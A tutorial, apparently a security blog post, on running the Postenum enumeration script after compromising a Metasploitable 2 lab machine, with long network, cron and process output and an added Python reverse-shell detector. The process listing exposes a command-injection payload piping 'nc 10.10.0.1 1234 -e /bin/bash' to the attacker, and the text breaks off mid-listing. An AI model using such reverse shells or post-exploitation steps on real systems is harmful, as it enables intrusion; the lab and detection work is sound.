How to Use Postenum to Gather Vital Data During Post-Exploitation

Jun 18, 2020 09:00 PM

Post-exploitation is often not quite as exciting as popping the initial shell, but it's a crucial phase for gathering data and further privilege escalation. Once a target is compromised, there's a lot of information to find and sift through. Luckily, there are tools available that can make the process easy. One such tool is Postenum.

To show everything Postenum has to offer for post-exploitation, we're using Kali Linux as our local machine. As for the target, if you want to follow along and try the tool out as a white hat or penetration tester, Metasploitable 2 is a good intentionally vulnerable virtual machine to use.

Phase 1: Initial Compromise

Before we can use Postenum, we must first exploit the target and get a shell. We can use command injection to run operating system commands on the server and abuse its functionality to get a reverse shell.

We'll also want to upgrade our new shell to a fully interactive one. That will make it easier to work in general and will also let us use tab completion and terminal history. And we'll assume the target has limited connectivity to the internet, so we'll need to find a way to transfer Postenum from our local machine.

First, grab the script from GitHub with the wget command:

~# wget https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh

--2020-06-18 16:14:29--  https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56110 (55K) [text/plain]
Saving to: ‘postenum.sh’

postenum.sh          100%[======================>]  54.79K  --.-KB/s    in 0.07s

2020-06-18 16:14:29 (749 KB/s) - ‘postenum.sh’ saved [56110/56110]

Next, we can start a simple server using Python to serve the file over HTTP:

~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

Back on the target system, let's move to a writable directory so we can download and run our script:

target:/var/vulnerabilities/exec$ cd /var/tmp/

target:/var/tmp$

Grab the file we are hosting on our machine, taking care to use the appropriate IP address:

target:/var/tmp$ wget http://10.10.0.1:8000/postenum.sh

--16:16:24--  http://10.10.0.1:8000/postenum.sh
           => `postenum.sh'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43,831 (43K) [text/x-sh]

100%[=================================================================================================================================================================================================>] 43,831        --.--K/s

16:16:24 (53.19 MB/s) - `postenum.sh' saved [43831/43831]

If everything worked, the request shows up in the output of the Python server on our local machine:

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.0.50 - - [18/Jun/2020 10:49:36] "GET /postenum.sh HTTP/1.0" 200 -

We can kill the Python server now that the script has been transferred. Then, if we list the contents of the directory, we'll see that the script isn't executable yet:

target:/var/tmp$ ls -la

total 52
drwxrwxrwt  2 root     root      4096 Jun 16 13:35 .
drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
-rw-r--r--  1 www-data www-data 43831 Jun 18  2020 postenum.sh

Use the chmod command to make it executable:

target:/var/tmp$ chmod +x postenum.sh

And we should see that it's now able to execute:

target:/var/tmp$ ls -la

total 52
drwxrwxrwt  2 root     root      4096 Jun 16 13:35 .
drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
-rwxr-xr-x  1 www-data www-data 43831 Jun 18  2020 postenum.sh

To run it, invoke it with the dot-slash prefix as you would any Bash script:

target:/var/tmp$ ./postenum.sh

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

 Usage   > ./postenum.sh <option>
 Options >
        -a :    All
        -s :    Filesystem [SUID, SGID, Config/DB files, etc.]
        -l :    Shell escape and development tools
        -c :    The most interesting files
        -n :    Network settings
        -p :    Services and cron jobs
        -o :    OS informations and priv esc exploits
        -v :    Sofware's versions
        -t :    Fstab credentials and databases checker

That will give us a nice little banner and some usage options.

Phase 2: Network Settings

The first option we'll cover will gather networking information and settings. Use the -n switch to kick it off:

target:/var/tmp$ ./postenum.sh -n

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] COMMUNICATING and NETWORKING
[+] - Check NIC(s) does the system have
[x] Available network interfaces on the system:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
        address 10.10.0.50
        netmask 255.255.255.0
        gateway 10.10.0.1

[x] Hosts:
127.0.0.1       localhost
127.0.1.1       target.localdomain      target

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts

[+] - Check network configuration settings
[x] DNS name servers:
search localdomain
nameserver 172.16.1.1

[x] Networks:
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0

[x] hostname:
target

[x] Get DNS domain or the FQDN:
localdomain

[+] - Check users and hosts communicating with the system
[x] Display all TCP/UDP connected socket, PID/program:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:41801           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:47536           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:44182           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:51902           0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:34846        10.10.0.1:1234          ESTABLISHED 4789/bash
tcp6       0      0 :::2121                 :::*                    LISTEN      -
tcp6       0      0 :::3632                 :::*                    LISTEN      -
tcp6       0      0 :::53                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::5432                 :::*                    LISTEN      -
tcp6       0      0 ::1:953                 :::*                    LISTEN      -
udp        0      0 0.0.0.0:2049            0.0.0.0:*                           -
udp        0      0 10.10.0.50:137          0.0.0.0:*                           -
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -
udp        0      0 10.10.0.50:138          0.0.0.0:*                           -
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -
udp        0      0 127.0.0.1:47783         127.0.0.1:47783         ESTABLISHED -
udp        0      0 0.0.0.0:36136           0.0.0.0:*                           -
udp        0      0 0.0.0.0:945             0.0.0.0:*                           -
udp        0      0 10.10.0.50:53           0.0.0.0:*                           -
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -
udp        0      0 0.0.0.0:52929           0.0.0.0:*                           -
udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
udp        0      0 0.0.0.0:40927           0.0.0.0:*                           -
udp        0      0 0.0.0.0:55275           0.0.0.0:*                           -
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
udp6       0      0 :::53                   :::*                                -
udp6       0      0 :::50653                :::*                                -

[x] List files based on their Internet address:
COMMAND  PID     USER   FD   TYPE DEVICE SIZE NODE NAME
bash    4789 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
bash    4789 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)

[x] Last logged in users:
root     pts/0        :0.0             Wed Jun 17 13:22   still logged in
reboot   system boot  2.6.24-16-server Wed Jun 17 13:21 - 13:43  (00:21)
msfadmin tty1                          Wed Jun 17 15:40 - down   (00:00)
msfadmin tty1                          Wed Jun 17 15:40 - 15:40  (00:00)

wtmp begins Wed Jun 18 15:38:50 2020

[x] Who is logged on and what they are doing:
 13:43:00 up 22 min,  1 user,  load average: 0.02, 0.04, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             13:22   21:03m  0.05s  0.05s -bash

[+] - Check cached IP and/or MAC addresses

We can see it gives us a lot of information, starting with the available network interfaces, hostnames, and addresses. It then shows us DNS settings and any symbolic names for networks. Finally, it lists the sockets and processes communicating with the system (including our own reverse shell, the ESTABLISHED bash connection to port 1234), followed by the last logged-in users and who is currently logged on.
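The same socket and lsof listings are what a defender would look at to spot this shell. Below is an added detection example (not part of Postenum or the original post) that parses rows like the `netstat -tunp` and `lsof -i` output above and flags any shell or interpreter that owns an established connection or has a network socket wired to its stdin/stdout. The sample lines are constructed from the output shown above; the `SHELL_LIKE` list and the `Finding` record are this example's own assumptions.

```python
"""Flag reverse-shell indicators in `netstat -tunp` and `lsof -i` output.

Constructed sample lines mirror what postenum -n printed on the target: a bash
process (PID 4789) whose stdin/stdout are the TCP socket to 10.10.0.1:1234.
"""
import re
from dataclasses import dataclass, field

# Shells and interpreters that should not own an established network socket,
# let alone have it wired to stdin/stdout. inetd-style daemons (xinetd children,
# as seen on the target) legitimately inherit a socket as fd 0/1, so they are
# deliberately not on this list. (Assumed list for this example.)
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "python", "python2", "python3",
              "perl", "nc", "ncat"}

NETSTAT_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pidprog>\S+)\s*$")

# The page's lsof rows have an empty SIZE column, so match around the protocol
# token instead of relying on a fixed column count.
LSOF_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<fd>\d+)[rwu]\s+.*?"
    r"\b(?P<proto>TCP|UDP)\s+(?P<name>\S+)(?:\s+\((?P<state>[A-Z_]+)\))?")

# Constructed sample: rows copied from the postenum -n output above plus one
# benign listener (apache2) to show what is *not* flagged.
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:34846        10.10.0.1:1234          ESTABLISHED 4789/bash
udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
"""
LSOF_SAMPLE = """\
COMMAND  PID     USER   FD   TYPE DEVICE SIZE NODE NAME
bash    4789 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
bash    4789 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
apache2 4621 www-data    4u  IPv4  11000       TCP *:80 (LISTEN)
"""


@dataclass
class Finding:
    pid: int
    program: str
    user: str
    remote: str
    reasons: list = field(default_factory=list)


def parse_netstat(text):
    """Yield one dict per connection row; header and unparsable lines are skipped."""
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        pid, _, prog = m.group("pidprog").partition("/")
        yield {"proto": m.group("proto"), "local": m.group("local"),
               "remote": m.group("remote"), "state": m.group("state") or "",
               "pid": int(pid) if pid.isdigit() else None, "program": prog}


def parse_lsof(text):
    """Yield one dict per numeric-fd socket row (cwd/txt/mem rows never match)."""
    for line in text.splitlines():
        m = LSOF_RE.match(line)
        if not m:
            continue
        yield {"cmd": m.group("cmd"), "pid": int(m.group("pid")),
               "user": m.group("user"), "fd": int(m.group("fd")),
               "proto": m.group("proto"), "name": m.group("name"),
               "state": m.group("state") or ""}


def find_reverse_shells(netstat_text, lsof_text):
    """Correlate both listings and return {pid: Finding} for suspicious processes."""
    hits = {}
    # Rule 1: a shell/interpreter owns an ESTABLISHED connection at all.
    for r in parse_netstat(netstat_text):
        if r["state"] == "ESTABLISHED" and r["program"] in SHELL_LIKE and r["pid"]:
            f = hits.setdefault(r["pid"], Finding(r["pid"], r["program"], "?", r["remote"]))
            f.reasons.append("netstat: shell owns an established socket")
    # Rule 2: stdin (fd 0) or stdout (fd 1) of a shell/interpreter *is* the socket,
    # the signature of `nc -e /bin/bash` or a pty spawned over the connection.
    for r in parse_lsof(lsof_text):
        if r["cmd"] in SHELL_LIKE and r["fd"] in (0, 1) and r["state"] == "ESTABLISHED":
            remote = r["name"].split("->", 1)[-1]
            f = hits.setdefault(r["pid"], Finding(r["pid"], r["cmd"], r["user"], remote))
            f.user = r["user"]
            f.reasons.append(f"lsof: fd {r['fd']} is a TCP socket")
    return hits


if __name__ == "__main__":
    for pid, f in sorted(find_reverse_shells(NETSTAT_SAMPLE, LSOF_SAMPLE).items()):
        print(f"[!] pid {pid} {f.program} ({f.user}) -> {f.remote}: " + "; ".join(f.reasons))
```

On the sample above this flags PID 4789 (bash) on both rules and PID 4797 (the `python -c 'import pty...'` upgrade) on the lsof rule, while the apache2 listener is left alone.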

Phase 3: Services & Cron Jobs

The next option we'll look at will discover running services and any cron jobs that are present on the system. Use the -p switch for this:

target:/var/tmp$ ./postenum.sh -p

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x  2 root     root     4096 Jul  5  2018 cron.d
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.daily
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.hourly
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.monthly
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.weekly
-rw-r--r--  1 root     root      724 Apr  8  2008 crontab

[x] List /etc/cron.d/
-rw-r--r-- 1 root root  507 May  3  2012 php5
-rw-r--r-- 1 root root 1323 Mar 31  2008 postgresql-common

[x] Root's cron jobs:
no crontab for www-data

[x] The content of /etc/crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[x] View daily cron jobs:
-rwxr-xr-x 1 root root  633 Feb  1  2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22  2008 apt
-rwxr-xr-x 1 root root  314 Apr  4  2008 aptitude
-rwxr-xr-x 1 root root  502 Dec 12  2007 bsdmainutils
-rwxr-xr-x 1 root root   89 Jun 17  2006 logrotate
-rwxr-xr-x 1 root root  954 Mar 12  2008 man-db
-rwxr-xr-x 1 root root  183 Mar  8  2008 mlocate
-rwxr-xr-x 1 root root  383 Apr 28  2010 samba
-rwxr-xr-x 1 root root 3295 Apr  8  2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23  2007 sysklogd
-rwxr-xr-x 1 root root  477 Dec  7  2008 tomcat55

[x] View monthly cron jobs:
-rwxr-xr-x 1 root root 664 Feb 20  2008 proftpd
-rwxr-xr-x 1 root root 129 Apr  8  2008 standard

[x] View weekly cron jobs:
-rwxr-xr-x 1 root root  528 Mar 12  2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28  2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23  2007 sysklogd

[+] - Check for running services, and which service(s) are been running by root
[x] Display every process on the system:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  0.6   2844  1696 ?        Ss   13:20   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   13:20   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   13:20   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   13:20   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   13:20   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   13:20   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   13:20   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpi_notify]
root        88  0.0  0.0      0     0 ?        S<   13:20   0:00 [kseriod]
root       125  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       126  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       127  0.0  0.0      0     0 ?        S<   13:20   0:00 [kswapd0]
root       169  0.0  0.0      0     0 ?        S<   13:20   0:00 [aio/0]
root      1125  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksnapd]
root      1316  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata/0]
root      1318  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata_aux]
root      1327  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_0]
root      1340  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_1]
root      1345  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksuspend_usbd]
root      1353  0.0  0.0      0     0 ?        S<   13:20   0:00 [khubd]
root      1771  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_2]
root      2295  0.0  0.0      0     0 ?        S<   13:20   0:00 [kjournald]
root      2460  0.0  0.2   2216   652 ?        S<s  13:20   0:01 /sbin/udevd --daemon
root      2706  0.0  0.0      0     0 ?        S<   13:20   0:00 [kpsmoused]
root      3588  0.0  0.0      0     0 ?        S<   13:21   0:00 [kjournald]
daemon    3717  0.0  0.2   1836   524 ?        Ss   13:21   0:00 /sbin/portmap
statd     3737  0.0  0.2   1900   728 ?        Ss   13:21   0:00 /sbin/rpc.statd
root      3743  0.0  0.0      0     0 ?        S<   13:21   0:00 [rpciod/0]
root      3758  0.0  0.2   3648   564 ?        Ss   13:21   0:00 /usr/sbin/rpc.idmapd
root      3985  0.0  0.1   1716   488 tty4     Ss+  13:21   0:00 /sbin/getty 38400 tty4
root      3986  0.0  0.1   1716   492 tty5     Ss+  13:21   0:00 /sbin/getty 38400 tty5
root      3990  0.0  0.1   1716   488 tty2     Ss+  13:21   0:00 /sbin/getty 38400 tty2
root      3993  0.0  0.1   1716   492 tty3     Ss+  13:21   0:00 /sbin/getty 38400 tty3
root      3996  0.0  0.1   1716   488 tty6     Ss+  13:21   0:00 /sbin/getty 38400 tty6
syslog    4034  0.0  0.2   1936   648 ?        Ss   13:21   0:00 /sbin/syslogd -u syslog
root      4069  0.0  0.2   1872   540 ?        S    13:21   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      4071  0.0  0.8   3152  2052 ?        Ss   13:21   0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind      4094  0.0  3.0  35408  7676 ?        Ssl  13:21   0:00 /usr/sbin/named -u bind
root      4116  0.0  0.3   5312   996 ?        Ss   13:21   0:00 /usr/sbin/sshd
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres  4323  0.1  1.9  41340  5068 ?        S    13:21   0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres  4326  0.2  0.5  41340  1376 ?        Ss   13:21   0:03 postgres: writer process
postgres  4327  0.2  0.4  41340  1188 ?        Ss   13:21   0:03 postgres: wal writer process
postgres  4328  0.0  0.5  41476  1432 ?        Ss   13:21   0:01 postgres: autovacuum launcher process
postgres  4329  0.0  0.4  12660  1172 ?        Ss   13:21   0:00 postgres: stats collector process
daemon    4349  0.0  0.1   2316   424 ?        SNs  13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4350  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4399  0.0  0.0      0     0 ?        S    13:21   0:00 [lockd]
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4401  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4402  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4403  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4404  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4405  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4406  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4407  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4408  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4412  0.0  0.1   2424   332 ?        Ss   13:21   0:00 /usr/sbin/rpc.mountd
daemon    4437  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4479  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4480  0.0  0.6   5412  1728 ?        Ss   13:21   0:00 /usr/lib/postfix/master
postfix   4484  0.0  0.6   5420  1644 ?        S    13:21   0:00 pickup -l -t fifo -u -c
postfix   4485  0.0  0.6   5460  1688 ?        S    13:21   0:00 qmgr -l -t fifo -u
root      4487  0.0  0.4   5388  1204 ?        Ss   13:21   0:00 /usr/sbin/nmbd -D
root      4489  0.0  0.5   7724  1364 ?        Ss   13:21   0:00 /usr/sbin/smbd -D
root      4493  0.0  0.3   7724   812 ?        S    13:21   0:00 /usr/sbin/smbd -D
root      4508  0.0  0.3   2424   856 ?        Ss   13:21   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd   4545  0.0  0.6   9948  1592 ?        Ss   13:21   0:00 proftpd: (accepting connections)
daemon    4559  0.0  0.1   1984   424 ?        Ss   13:21   0:00 /usr/sbin/atd
root      4570  0.0  0.3   2104   896 ?        Ss   13:21   0:00 /usr/sbin/cron
root      4598  0.0  0.1   2052   348 ?        Ss   13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4599  0.0  0.1   2052   476 ?        S    13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55  4601  5.3 44.8 389632 114652 ?       Sl   13:21   1:12 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
www-data  4621  0.0  0.9  10728  2516 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4624  0.0  0.9  10728  2492 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4626  0.0  0.8  10596  2096 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4628  0.0  0.9  10596  2436 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4629  0.0  0.9  10728  2500 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
root      4638  0.0 10.3  66344 26472 ?        Sl   13:21   0:00 /usr/bin/rmiregistry
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4649  0.0  0.1   1716   488 tty1     Ss+  13:21   0:00 /sbin/getty 38400 tty1
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
root      4659  0.3  4.7  14036 12016 ?        S    13:21   0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      4664  0.0  0.4   2724  1188 ?        S    13:21   0:00 /bin/sh /root/.vnc/xstartup
root      4667  0.0  1.0   5936  2572 ?        S    13:21   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      4670  0.3  1.9   8988  5000 ?        S    13:21   0:05 fluxbox
root      4704  0.0  0.6   2852  1544 pts/0    Ss+  13:22   0:00 -bash
www-data  4759  0.0  0.7  10596  1956 ?        S    13:23   0:00 /usr/sbin/apache2 -k start
www-data  4780  0.0  0.7  10596  1956 ?        S    13:29   0:00 /usr/sbin/apache2 -k start
www-data  4787  0.0  0.5   3248  1460 ?        S    13:29   0:00 sh -c ping  -c 3 localhost && nc 10.10.0.1 1234 -e /bin/bash
www-data  4789  0.0  0.5   3248  1448 ?        S    13:29   0:00 bash
www-data  4797  0.0  0.9   3960  2472 ?        S    13:31   0:00 python -c import pty;pty.spawn("/bin/bash")
